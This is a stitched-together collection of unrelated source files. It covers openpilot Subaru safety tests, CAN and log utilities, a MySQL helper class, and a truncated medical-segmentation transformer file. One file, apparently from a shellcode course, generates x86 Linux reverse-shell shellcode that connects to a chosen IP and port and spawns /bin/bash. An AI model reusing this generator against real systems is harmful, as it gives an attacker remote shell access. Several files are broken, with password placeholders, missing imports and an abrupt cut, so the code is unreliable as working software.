TestSubaruSafety(unittest.TestCase): @classmethod def setUp(cls): cls.safety = libpandasafety_py.libpandasafety cls.safety.set_safety_hooks(Panda.SAFETY_SUBARU, 0) cls.safety.init_tests_subaru() def _set_prev_torque(self, t): self.safety.set_subaru_desired_torque_last(t) self.safety.set_subaru_rt_torque_last(t) def _torque_driver_msg(self, torque): t = twos_comp(torque, 11) to_send = make_msg(0, 0x119) to_send[0].RDLR = ((t & 0x7FF) << 16) return to_send def _torque_msg(self, torque): to_send = make_msg(0, 0x122) t = twos_comp(torque, 13) to_send[0].RDLR = (t << 16) return to_send def test_spam_can_buses(self): test_spam_can_buses(self, TX_MSGS) def test_relay_malfunction(self): test_relay_malfunction(self, 0x122) def test_default_controls_not_allowed(self): self.assertFalse(self.safety.get_controls_allowed()) def test_enable_control_allowed_from_cruise(self): to_push = make_msg(0, 0x240) to_push[0].RDHR = 1 << 9 self.safety.safety_rx_hook(to_push) self.assertTrue(self.safety.get_controls_allowed()) def test_disable_control_allowed_from_cruise(self): to_push = make_msg(0, 0x240) to_push[0].RDHR = 0 self.safety.set_controls_allowed(1) self.safety.safety_rx_hook(to_push) self.assertFalse(self.safety.get_controls_allowed()) def test_steer_safety_check(self): for enabled in [0, 1]: for t in range(-3000, 3000): self.safety.set_controls_allowed(enabled) self._set_prev_torque(t) if abs(t) > MAX_STEER or (not enabled and abs(t) > 0): self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(t))) else: self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) def test_manually_enable_controls_allowed(self): test_manually_enable_controls_allowed(self) def test_non_realtime_limit_up(self): self.safety.set_subaru_torque_driver(0, 0) self.safety.set_controls_allowed(True) self._set_prev_torque(0) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(MAX_RATE_UP))) self._set_prev_torque(0) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(-MAX_RATE_UP))) self._set_prev_torque(0) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(MAX_RATE_UP + 1))) self.safety.set_controls_allowed(True) self._set_prev_torque(0) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(-MAX_RATE_UP - 1))) def test_non_realtime_limit_down(self): self.safety.set_subaru_torque_driver(0, 0) self.safety.set_controls_allowed(True) def test_against_torque_driver(self): self.safety.set_controls_allowed(True) for sign in [-1, 1]: for t in np.arange(0, DRIVER_TORQUE_ALLOWANCE + 1, 1): t *= -sign self.safety.set_subaru_torque_driver(t, t) self._set_prev_torque(MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(MAX_STEER * sign))) self.safety.set_subaru_torque_driver(DRIVER_TORQUE_ALLOWANCE + 1, DRIVER_TORQUE_ALLOWANCE + 1) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(-MAX_STEER))) # spot check some individual cases for sign in [-1, 1]: driver_torque = (DRIVER_TORQUE_ALLOWANCE + 10) * sign torque_desired = (MAX_STEER - 10 * DRIVER_TORQUE_FACTOR) * sign delta = 1 * sign self._set_prev_torque(torque_desired) self.safety.set_subaru_torque_driver(-driver_torque, -driver_torque) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(torque_desired))) self._set_prev_torque(torque_desired + delta) self.safety.set_subaru_torque_driver(-driver_torque, -driver_torque) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(torque_desired + delta))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg((MAX_STEER - MAX_RATE_DOWN) * sign))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(0))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg((MAX_STEER - MAX_RATE_DOWN + 1) * sign))) def test_realtime_limits(self): self.safety.set_controls_allowed(True) for sign in [-1, 1]: self.safety.init_tests_subaru() self._set_prev_torque(0) self.safety.set_subaru_torque_driver(0, 0) for t in np.arange(0, MAX_RT_DELTA, 1): t *= sign self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA + 1)))) self._set_prev_torque(0) for t in np.arange(0, MAX_RT_DELTA, 1): t *= sign self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) # Increase timer to update rt_torque_last self.safety.set_timer(RT_INTERVAL + 1) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA - 1)))) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA + 1)))) def test_fwd_hook(self): buss = list(range(0x0, 0x3)) msgs = list(range(0x1, 0x800)) blocked_msgs = [290, 356, 545, 802] for b in buss: for m in msgs: if b == 0: fwd_bus = 2 elif b == 1: fwd_bus = -1 elif b == 2: fwd_bus = -1 if m in blocked_msgs else 0 # assume len 8 self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(b, make_msg(b, m, 8))) if __name__ == "__main__": unittest.main() ``` #### File: pyextra/logentries/metrics.py ```python from logentries import LogentriesHandler from threading import Lock from functools import wraps import logging import time import sys import psutil glob_time = 0 glob_name = 0 log = logging.getLogger('logentries') log.setLevel(logging.INFO) class Metric(object): def __init__(self, token): self._count = 0.0 self._sum = 0.0 self._lock = Lock() self.token = token handler = LogentriesHandler(token) log.addHandler(handler) def observe(self, amount): with self._lock: self._count += 1 self._sum += amount def metric(self): '''Mesaure function execution time in seconds and forward it to Logentries''' class Timer(object): def __init__(self, summary): self._summary = summary def __enter__(self): self._start = time.time() def __exit__(self, typ, value, traceback): global glob_time self._summary.observe(max(time.time() - self._start, 0)) glob_time = time.time()- self._start log.info("function_name=" + glob_name + " " + "execution_time=" + str(glob_time) + " " + "cpu=" + str(psutil.cpu_percent(interval=None)) + " " + "cpu_count=" + str(psutil.cpu_count())+ " " + "memory=" + str(psutil.virtual_memory()) ) def __call__(self, f): @wraps(f) def wrapped(*args, **kwargs): with self: global glob_name glob_name = f.__name__ return f(*args, **kwargs) return wrapped return Timer(self) ``` #### File: boardd/tests/test_boardd_api.py ```python import random import numpy as np import selfdrive.boardd.tests.boardd_old as boardd_old import selfdrive.boardd.boardd as boardd from common.realtime import sec_since_boot from cereal import log import unittest def generate_random_can_data_list(): can_list = [] cnt = random.randint(1, 64) for j in range(cnt): can_data = np.random.bytes(random.randint(1, 8)) can_list.append([random.randint(0, 128), random.randint(0, 128), can_data, random.randint(0, 128)]) return can_list, cnt class TestBoarddApiMethods(unittest.TestCase): def test_correctness(self): for i in range(1000): can_list, _ = generate_random_can_data_list() # Sendcan # Old API m_old = boardd_old.can_list_to_can_capnp(can_list, 'sendcan').to_bytes() # new API m = boardd.can_list_to_can_capnp(can_list, 'sendcan') ev_old = log.Event.from_bytes(m_old) ev = log.Event.from_bytes(m) self.assertEqual(ev_old.which(), ev.which()) self.assertEqual(len(ev.sendcan), len(ev_old.sendcan)) for i in range(len(ev.sendcan)): attrs = ['address', 'busTime', 'dat', 'src'] for attr in attrs: self.assertEqual(getattr(ev.sendcan[i], attr, 'new'), getattr(ev_old.sendcan[i], attr, 'old')) # Can m_old = boardd_old.can_list_to_can_capnp(can_list, 'can').to_bytes() # new API m = boardd.can_list_to_can_capnp(can_list, 'can') ev_old = log.Event.from_bytes(m_old) ev = log.Event.from_bytes(m) self.assertEqual(ev_old.which(), ev.which()) self.assertEqual(len(ev.can), len(ev_old.can)) for i in range(len(ev.can)): attrs = ['address', 'busTime', 'dat', 'src'] for attr in attrs: self.assertEqual(getattr(ev.can[i], attr, 'new'), getattr(ev_old.can[i], attr, 'old')) def test_performance(self): can_list, cnt = generate_random_can_data_list() recursions = 1000 n1 = sec_since_boot() for i in range(recursions): boardd_old.can_list_to_can_capnp(can_list, 'sendcan').to_bytes() n2 = sec_since_boot() elapsed_old = n2 - n1 # print('Old API, elapsed time: {} secs'.format(elapsed_old)) n1 = sec_since_boot() for i in range(recursions): boardd.can_list_to_can_capnp(can_list) n2 = sec_since_boot() elapsed_new = n2 - n1 # print('New API, elapsed time: {} secs'.format(elapsed_new)) self.assertTrue(elapsed_new < elapsed_old / 2) if __name__ == '__main__': unittest.main() ``` #### File: camerad/snapshot/visionipc.py ```python import os from cffi import FFI import numpy as np gf_dir = os.path.dirname(os.path.abspath(__file__)) ffi = FFI() ffi.cdef(""" typedef enum VisionStreamType { VISION_STREAM_RGB_BACK, VISION_STREAM_RGB_FRONT, VISION_STREAM_YUV, VISION_STREAM_YUV_FRONT, VISION_STREAM_MAX, } VisionStreamType; typedef struct VisionUIInfo { int big_box_x, big_box_y; int big_box_width, big_box_height; int transformed_width, transformed_height; int front_box_x, front_box_y; int front_box_width, front_box_height; } VisionUIInfo; typedef struct VisionStreamBufs { VisionStreamType type; int width, height, stride; size_t buf_len; union { VisionUIInfo ui_info; } buf_info; } VisionStreamBufs; typedef struct VIPCBuf { int fd; size_t len; void* addr; } VIPCBuf; typedef struct VIPCBufExtra { // only for yuv uint32_t frame_id; uint64_t timestamp_eof; } VIPCBufExtra; typedef struct VisionStream { int ipc_fd; int last_idx; int last_type; int num_bufs; VisionStreamBufs bufs_info; VIPCBuf *bufs; } VisionStream; int visionstream_init(VisionStream *s, VisionStreamType type, bool tbuffer, VisionStreamBufs *out_bufs_info); VIPCBuf* visionstream_get(VisionStream *s, VIPCBufExtra *out_extra); void visionstream_destroy(VisionStream *s); """ ) class VisionIPCError(Exception): pass class VisionIPC(): def __init__(self, front=False): self.clib = ffi.dlopen(os.path.join(gf_dir, "libvisionipc.so")) self.s = ffi.new("VisionStream*") self.buf_info = ffi.new("VisionStreamBufs*") err = self.clib.visionstream_init(self.s, self.clib.VISION_STREAM_RGB_FRONT if front else self.clib.VISION_STREAM_RGB_BACK, True, self.buf_info) if err != 0: self.clib.visionstream_destroy(self.s) raise VisionIPCError def __del__(self): self.clib.visionstream_destroy(self.s) def get(self): buf = self.clib.visionstream_get(self.s, ffi.NULL) pbuf = ffi.buffer(buf.addr, buf.len) ret = np.frombuffer(pbuf, dtype=np.uint8).reshape((-1, self.buf_info.stride//3, 3)) return ret[:self.buf_info.height, :self.buf_info.width, [2,1,0]] ``` #### File: car/chrysler/radar_interface.py ```python import os from opendbc.can.parser import CANParser from cereal import car from selfdrive.car.interfaces import RadarInterfaceBase RADAR_MSGS_C = list(range(0x2c2, 0x2d4+2, 2)) # c_ messages 706,...,724 RADAR_MSGS_D = list(range(0x2a2, 0x2b4+2, 2)) # d_ messages LAST_MSG = max(RADAR_MSGS_C + RADAR_MSGS_D) NUMBER_MSGS = len(RADAR_MSGS_C) + len(RADAR_MSGS_D) def _create_radar_can_parser(): dbc_f = 'chrysler_pacifica_2017_hybrid_private_fusion.dbc' msg_n = len(RADAR_MSGS_C) # list of [(signal name, message name or number, initial values), (...)] # [('RADAR_STATE', 1024, 0), # ('LONG_DIST', 1072, 255), # ('LONG_DIST', 1073, 255), # ('LONG_DIST', 1074, 255), # ('LONG_DIST', 1075, 255), # The factor and offset are applied by the dbc parsing library, so the # default values should be after the factor/offset are applied. signals = list(zip(['LONG_DIST'] * msg_n + ['LAT_DIST'] * msg_n + ['REL_SPEED'] * msg_n, RADAR_MSGS_C * 2 + # LONG_DIST, LAT_DIST RADAR_MSGS_D, # REL_SPEED [0] * msg_n + # LONG_DIST [-1000] * msg_n + # LAT_DIST [-146.278] * msg_n)) # REL_SPEED set to 0, factor/offset to this # TODO what are the checks actually used for? # honda only checks the last message, # toyota checks all the messages. Which do we want? checks = list(zip(RADAR_MSGS_C + RADAR_MSGS_D, [20]*msg_n + # 20Hz (0.05s) [20]*msg_n)) # 20Hz (0.05s) return CANParser(os.path.splitext(dbc_f)[0], signals, checks, 1) def _address_to_track(address): if address in RADAR_MSGS_C: return (address - RADAR_MSGS_C[0]) // 2 if address in RADAR_MSGS_D: return (address - RADAR_MSGS_D[0]) // 2 raise ValueError("radar received unexpected address %d" % address) class RadarInterface(RadarInterfaceBase): def __init__(self, CP): self.pts = {} self.delay = 0 # Delay of radar #TUNE self.rcp = _create_radar_can_parser() self.updated_messages = set() self.trigger_msg = LAST_MSG def update(self, can_strings): vls = self.rcp.update_strings(can_strings) self.updated_messages.update(vls) if self.trigger_msg not in self.updated_messages: return None ret = car.RadarData.new_message() errors = [] if not self.rcp.can_valid: errors.append("canError") ret.errors = errors for ii in self.updated_messages: # ii should be the message ID as a number cpt = self.rcp.vl[ii] trackId = _address_to_track(ii) if trackId not in self.pts: self.pts[trackId] = car.RadarData.RadarPoint.new_message() self.pts[trackId].trackId = trackId self.pts[trackId].aRel = float('nan') self.pts[trackId].yvRel = float('nan') self.pts[trackId].measured = True if 'LONG_DIST' in cpt: # c_* message self.pts[trackId].dRel = cpt['LONG_DIST'] # from front of car # our lat_dist is positive to the right in car's frame. # TODO what does yRel want? self.pts[trackId].yRel = cpt['LAT_DIST'] # in car frame's y axis, left is positive else: # d_* message self.pts[trackId].vRel = cpt['REL_SPEED'] # We want a list, not a dictionary. Filter out LONG_DIST==0 because that means it's not valid. ret.points = [x for x in self.pts.values() if x.dRel != 0] self.updated_messages.clear() return ret ``` #### File: selfdrive/debug/can_compare.py ```python import binascii import os import sys from collections import defaultdict import cereal.messaging as messaging from common.realtime import sec_since_boot def can_compare(bus=0, max_msg=None, addr="127.0.0.1"): logcan = messaging.sub_sock('can', addr=addr) start = sec_since_boot() msgs = defaultdict(list) canbus = int(os.getenv("CAN", bus)) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs[y.address].append(y.dat) try: input("Change State and press Enter to continue...") except SyntaxError: pass start = sec_since_boot() msgs2 = defaultdict(list) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs2[y.address].append(y.dat) try: input("Change State back and press Enter to continue...") except SyntaxError: pass start = sec_since_boot() msgs3 = defaultdict(list) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs3[y.address].append(y.dat) dd = chr(27) + "[2J" dd += "%5.2f\n" % (sec_since_boot() - start) for k,v in sorted(zip(msgs.keys(), map(lambda x: binascii.hexlify(x[-1]), msgs.values()))): try: if binascii.hexlify(list(msgs2.values())[list(msgs2).index(k)][-1]) != binascii.hexlify(list(msgs3.values())[list(msgs3).index(k)][-1]) and v == binascii.hexlify(list(msgs3.values())[list(msgs3).index(k)][-1]): dd += "%s(%6d) %s\n" % ("%04X(%4d)" % (k,k),len(msgs[k]), v.decode('ascii')) w = binascii.hexlify(list(msgs2.values())[list(msgs2).index(k)][-1]) dd +="%s(%6d) %s\n" % ("%04X(%4d)" % (k,k),len(msgs[k]), w.decode('ascii')) except ValueError: pass print(dd) if __name__ == "__main__": if len(sys.argv) > 3: can_compare(int(sys.argv[1]), int(sys.argv[2]), sys.argv[3]) elif len(sys.argv) > 2: can_compare(int(sys.argv[1]), int(sys.argv[2])) elif len(sys.argv) > 1: can_compare(int(sys.argv[1])) else: can_compare() ``` #### File: tools/lib/cache.py ```python import os from tools.lib.file_helpers import mkdirs_exists_ok DEFAULT_CACHE_DIR = os.path.expanduser("~/.commacache") def cache_path_for_file_path(fn, cache_prefix=None): dir_ = os.path.join(DEFAULT_CACHE_DIR, "local") mkdirs_exists_ok(dir_) return os.path.join(dir_, os.path.abspath(fn).replace("/", "_")) ``` #### File: tools/lib/log_util.py ```python from cereal import log as capnp_log def write_can_to_msg(data, src, msg): if not isinstance(data[0], Sequence): data = [data] can_msgs = msg.init('can', len(data)) for i, d in enumerate(data): if d[0] < 0: continue # ios bug cc = can_msgs[i] cc.address = d[0] cc.busTime = 0 cc.dat = hex_to_str(d[2]) if len(d) == 4: cc.src = d[3] cc.busTime = d[1] else: cc.src = src def convert_old_pkt_to_new(old_pkt): m, d = old_pkt msg = capnp_log.Event.new_message() if len(m) == 3: _, pid, t = m msg.logMonoTime = t else: t, pid = m msg.logMonoTime = int(t * 1e9) last_velodyne_time = None if pid == PID_OBD: write_can_to_msg(d, 0, msg) elif pid == PID_CAM: frame = msg.init('frame') frame.frameId = d[0] frame.timestampEof = msg.logMonoTime # iOS elif pid == PID_IGPS: loc = msg.init('gpsLocation') loc.latitude = d[0] loc.longitude = d[1] loc.speed = d[2] loc.timestamp = int(m[0]*1000.0) # on iOS, first number is wall time in seconds loc.flags = 1 | 4 # has latitude, longitude, and speed. elif pid == PID_IMOTION: user_acceleration = d[:3] gravity = d[3:6] # iOS separates gravity from linear acceleration, so we recombine them. # Apple appears to use this constant for the conversion. g = -9.8 acceleration = [g*(a + b) for a, b in zip(user_acceleration, gravity)] accel_event = msg.init('sensorEvents', 1)[0] accel_event.acceleration.v = acceleration # android elif pid == PID_GPS: if len(d) <= 6 or d[-1] == "gps": loc = msg.init('gpsLocation') loc.latitude = d[0] loc.longitude = d[1] loc.speed = d[2] if len(d) > 6: loc.timestamp = d[6] loc.flags = 1 | 4 # has latitude, longitude, and speed. elif pid == PID_ACCEL: val = d[2] if type(d[2]) != type(0.0) else d accel_event = msg.init('sensorEvents', 1)[0] accel_event.acceleration.v = val elif pid == PID_GYRO: val = d[2] if type(d[2]) != type(0.0) else d gyro_event = msg.init('sensorEvents', 1)[0] gyro_event.init('gyro').v = val elif pid == PID_LIDAR: lid = msg.init('lidarPts') lid.idx = d[3] elif pid == PID_APPLANIX: loc = msg.init('liveLocation') loc.status = d[18] loc.lat, loc.lon, loc.alt = d[0:3] loc.vNED = d[3:6] loc.roll = d[6] loc.pitch = d[7] loc.heading = d[8] loc.wanderAngle = d[9] loc.trackAngle = d[10] loc.speed = d[11] loc.gyro = d[12:15] loc.accel = d[15:18] elif pid == PID_IBAROMETER: pressure_event = msg.init('sensorEvents', 1)[0] _, pressure = d[0:2] pressure_event.init('pressure').v = [pressure] # Kilopascals elif pid == PID_IINIT and len(d) == 4: init_event = msg.init('initData') init_event.deviceType = capnp_log.InitData.DeviceType.chffrIos build_info = init_event.init('iosBuildInfo') build_info.appVersion = d[0] build_info.appBuild = int(d[1]) build_info.osVersion = d[2] build_info.deviceModel = d[3] return msg.as_reader() ```
{ "source": "91fc7b/SLAE", "score": 3 }
#### File: SLAE/2/create_shellcode.py ```python import sys def ip2int(ip): o = map(int, ip.split('.')) res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3] return res def int2ip(ipnum): o1 = int(ipnum / 16777216) % 256 o2 = int(ipnum / 65536) % 256 o3 = int(ipnum / 256) % 256 o4 = int(ipnum) % 256 return '%(o1)s.%(o2)s.%(o3)s.%(o4)s' % locals() shellcode_start = "\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x01\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x03\\x68" shellcode_ip = "\\x7f\\x01\\x01\\x01" #ip 127.1.1.1 shellcode_middle = "\\x66\\x68" shellcode_port = "\\x04\\xd2" #1234 shellcode_end = "\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x31\\xc9\\x51\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80" if len(sys.argv) == 3: port_number = int(sys.argv[2]) #port_number = 1234 port_str = "{0:0{1}x}".format(port_number,4) shellcode_port = "\\x" + port_str[0] + port_str[1] + "\\x" + port_str[2] + port_str[3] ip_number = ip2int(sys.argv[1]) ip_str = "{0:0{1}x}".format(ip_number,8) shellcode_ip = "\\x" + ip_str[0] + ip_str[1] + "\\x" + ip_str[2] + ip_str[3] + "\\x" + ip_str[4] + ip_str[5] + "\\x" + ip_str[6] + ip_str[7] # print ip_str #print "DEBUG IP " + shellcode_ip #print "DEBUG PORT " + shellcode_port print shellcode_start + shellcode_ip + shellcode_middle + shellcode_port + shellcode_end ```
{ "source": "91-jinrong/-91_monitor", "score": 3 }
#### File: python/modules/mysql_server.py ```python import os import sys import string import time import datetime import MySQLdb class MySQL: def __int__(self,host,port,user,passwd,dbname,timeout,charset): self.host = host self.port = port self.user = user self.passwd = <PASSWORD> self.dbname = test self.timeout = timeout self.charset = charset def db_connect(self): connect=MySQLdb.connect(host=self.host,user=self.user,passwd=<PASSWORD>,port=int(self.port),connect_timeout=int(self.timeout),charset=self.charset) return connect def execute(self,sql,param): conn=MySQLdb.connect(host=self.host,user=self.user,passwd=<PASSWORD>,port=int(self.port),connect_timeout=int(self.timeout),charset=self.charset) conn.select_db(self.dbname) cursor = conn.cursor() if param <> '': cursor.execute(sql,param) else: cursor.execute(sql) conn.commit() cursor.close() conn.close() def query(self,sql): conn=MySQLdb.connect(host=self.host,user=self.user,passwd=<PASSWORD>,port=int(self.port),connect_timeout=int(self.timeout),charset=self.charset) conn.select_db(self.dbname) cursor = conn.cursor() count=cursor.execute(sql) if count == 0 : result=0 else: result=cursor.fetchall() return result cursor.close() conn.close() def get_option(self,key): conn=MySQLdb.connect(host=self.host,user=self.user,passwd=<PASSWORD>,port=int(self.port),connect_timeout=int(self.timeout),charset=self.charset) conn.select_db(self.dbname) cursor = conn.cursor() sql="select value from options where name=+'"+key+"'" count=cursor.execute(sql) if count == 0 : result=0 else: result=cursor.fetchone() return result[0] cursor.close() conn.close() ```
{ "source": "91nunocosta/cookiecutterizer", "score": 3 }
#### File: cookiecutterizer/tests/helpers.py ```python import shutil import textwrap from pathlib import Path from typing import Optional def create_text_file(directory: Path, file_name: str, content: str) -> Path: if not directory.exists(): directory.mkdir(parents=True) path = directory / file_name with path.open("w") as text_file: text_file.write(textwrap.dedent(content)) return path def create_binary_file(directory: Path, file_name: str) -> Path: if not directory.exists(): directory.mkdir(parents=True) path = directory / file_name shutil.copy(Path(__file__).parent / "data" / "bin", path) return path # pylint: disable=unsubscriptable-object def load_text_file(directory: Path, file_name: str) -> Optional[str]: path = directory / file_name if not path.exists(): return None with path.open("r") as text_file: return text_file.read() ``` #### File: cookiecutterizer/tests/test_cookiecutterizer.py ```python import textwrap from pathlib import Path from cookiecutterizer import create_file, target_files from tests.helpers import create_binary_file, create_text_file, load_text_file def create_emtpy_file(path: Path): with path.open("w"): pass def test_target_files(tmp_path): """Test function.""" destination = tmp_path / "destination" seed_project = tmp_path / "project" seed_project.mkdir() (seed_project / "dir1").mkdir() (seed_project / "dir2").mkdir() create_emtpy_file(seed_project / "file") (seed_project / "dir2" / "dir1").mkdir() (seed_project / "dir2" / "dir2").mkdir() create_emtpy_file(seed_project / "dir2" / "file") result = list(target_files(seed_project, {}, destination)) assert len(result) == 7 assert set(result) == { (seed_project, destination / "project"), (seed_project / "dir1", destination / "project" / "dir1"), (seed_project / "dir2", destination / "project" / "dir2"), (seed_project / "file", destination / "project" / "file"), (seed_project / "dir2" / "dir1", destination / "project" / "dir2" / "dir1"), (seed_project / "dir2" / "dir2", destination / "project" / "dir2" / "dir2"), (seed_project / "dir2" / "file", destination / "project" / "dir2" / "file"), } def test_target_files_with_replacement(tmp_path): """Test function.""" destination = tmp_path / "destination" seed_project = tmp_path / "project" seed_project.mkdir() (seed_project / "dir1").mkdir() (seed_project / "dir2").mkdir() create_emtpy_file(seed_project / "file") (seed_project / "dir2" / "dir1").mkdir() (seed_project / "dir2" / "dir2").mkdir() create_emtpy_file(seed_project / "dir2" / "file") result = list( target_files(seed_project, {"dir": "directory", "file": "f"}, destination) ) assert len(result) == 7 assert set(result) == { (seed_project, destination / "project"), (seed_project / "dir1", destination / "project" / "directory1"), (seed_project / "dir2", destination / "project" / "directory2"), (seed_project / "file", destination / "project" / "f"), ( seed_project / "dir2" / "dir1", destination / "project" / "directory2" / "directory1", ), ( seed_project / "dir2" / "dir2", destination / "project" / "directory2" / "directory2", ), (seed_project / "dir2" / "file", destination / "project" / "directory2" / "f"), } def test_create_file_with_empty_substiutions(tmp_path): """Test creating file from seed, applying substitutions.""" seed_file = create_text_file( tmp_path, "seed.txt", """ line1 line2 ... linen """, ) create_file(seed_file, {}, tmp_path / "target.txt") assert (tmp_path / "target.txt").exists() assert load_text_file(tmp_path, "target.txt") == textwrap.dedent( """ line1 line2 ... linen """ ) def test_create_file_with_substiutions(tmp_path): """Test creating file from seed, applying substitutions.""" seed_file = create_text_file( tmp_path, "seed.txt", """ line1 line2 ... linen """, ) create_file(seed_file, {"line": "enil"}, tmp_path / "target.txt") assert (tmp_path / "target.txt").exists() assert load_text_file(tmp_path, "target.txt") == textwrap.dedent( """ enil1 enil2 ... eniln """ ) def test_create_binary_file(tmp_path): """Test creating file from binary file seed.""" seed_file = create_binary_file( tmp_path, "seed", ) create_file(seed_file, {"line": "enil"}, tmp_path / "target") assert not (tmp_path / "target").exists() ```
{ "source": "91nunocosta/literature", "score": 2 }
#### File: literature/katapy/precommit.py ```python import invoke @invoke.task def run(c): """Run pre-commit on all files.""" c.run("pre-commit run --all-files", pty=True) ```
{ "source": "91nunocosta/prototype-python-library", "score": 4 }
#### File: prototype-python-library/prototype_python_library/__init__.py ```python __version__ = "0.8.0" def fib(n: int) -> int: """Compute an element in the fibonacci sequence. >>> fib(0) 0 Args: n (int): the position in the sequence. Returns: The nth element in the fibonacci sequence. """ if n == 0: return 0 if n == 1: return 1 return fib(n - 1) + fib(n - 2) ```
{ "source": "920232796/bert_seq2seq", "score": 3 }
#### File: bert_seq2seq/bert_seq2seq/bert_cls_classifier.py ```python import torch import torch.nn as nn from bert_seq2seq.tokenizer import Tokenizer from bert_seq2seq.basic_bert import BasicBert class BertClsClassifier(BasicBert): """ """ def __init__(self, word2ix, target_size, model_name="roberta"): super(BertClsClassifier, self).__init__(word2ix=word2ix, model_name=model_name) self.target_size = target_size self.final_dense = nn.Linear(self.config.hidden_size, self.target_size) def compute_loss(self, predictions, labels): """ 计算loss predictions: (batch_size, 1) """ predictions = predictions.view(-1, self.target_size) labels = labels.view(-1) loss = nn.CrossEntropyLoss(reduction="mean") return loss(predictions, labels) def forward(self, text, position_enc=None, labels=None, use_layer_num=-1): if use_layer_num != -1: if use_layer_num < 0 or use_layer_num > 7: # 越界 raise Exception("层数选择错误,因为bert base模型共8层,所以参数只只允许0 - 7, 默认为-1,取最后一层") text = text.to(self.device) if position_enc is not None: position_enc = position_enc.to(self.device) if labels is not None: labels = labels.to(self.device) enc_layers, _ = self.bert(text, output_all_encoded_layers=True) squence_out = enc_layers[use_layer_num] cls_token = squence_out[:, 0]# 取出cls向量 进行分类 # print(cls_token) predictions = self.final_dense(cls_token) if labels is not None: ## 计算loss loss = self.compute_loss(predictions, labels) return predictions, loss else : return predictions ``` #### File: bert_seq2seq/bert_seq2seq/bert_seq_labeling_crf.py ```python import torch import torch.nn as nn from bert_seq2seq.tokenizer import Tokenizer from bert_seq2seq.model.crf import CRFLayer from bert_seq2seq.basic_bert import BasicBert class BertSeqLabelingCRF(BasicBert): """ """ def __init__(self, word2ix, target_size, model_name="roberta"): super(BertSeqLabelingCRF, self).__init__(word2ix=word2ix, model_name=model_name) self.target_size = target_size self.final_dense = nn.Linear(self.config.hidden_size, self.target_size) self.crf_layer = CRFLayer(self.target_size) def compute_loss(self, predictions, labels): """ 计算loss """ loss = self.crf_layer(predictions, labels, self.target_mask) return loss.mean() def forward(self, text, position_enc=None, labels=None, use_layer_num=-1): if use_layer_num != -1: if use_layer_num < 0 or use_layer_num > 7: # 越界 raise Exception("层数选择错误,因为bert base模型共8层,所以参数只只允许0 - 7, 默认为-1,取最后一层") # 计算target mask self.target_mask = (text > 0).float().to(self.device) text = text.to(self.device) if position_enc is not None : position_enc = position_enc.to(self.device) if labels is not None : labels = labels.to(self.device) enc_layers, _ = self.bert(text, output_all_encoded_layers=True) squence_out = enc_layers[use_layer_num] transform_out = self.transform(squence_out) # print(cls_token) predictions = self.final_dense(transform_out) if labels is not None: ## 计算loss loss = self.compute_loss(predictions, labels) return predictions, loss else : return predictions ```
{ "source": "920232796/MedicalSeg", "score": 3 }
#### File: medical_seg/loss/uncertainty_loss.py ```python import torch class UncertaintyLoss: def __init__(self): pass def __call__(self, pred, pred_uncer, label): pass pred_uncer = torch.sigmoid(pred_uncer) pred = pred.argmax(dim=1) true_pos = (pred == label).float() loss = pred_uncer * true_pos - pred_uncer * (1 - true_pos) return loss.mean() ``` #### File: networks/layers/fusion_transformer.py ```python from os import path from time import time import numpy as np import math from einops import rearrange import torch.nn as nn import torch import ml_collections from medical_seg.networks.layers.multi_attention import MultiAttentionTransformer def get_config(in_channels=1, hidden_size=128, img_size=(1, 1, 1), patch_size=(1, 1, 1), mlp_dim=256, num_heads=8): config = ml_collections.ConfigDict() config.hidden_size = hidden_size config.in_channels = in_channels config.transformer = ml_collections.ConfigDict() config.transformer.mlp_dim = mlp_dim config.transformer.num_heads = num_heads config.transformer.num_layers = 1 config.transformer.attention_dropout_rate = 0.0 config.transformer.dropout_rate = 0.5 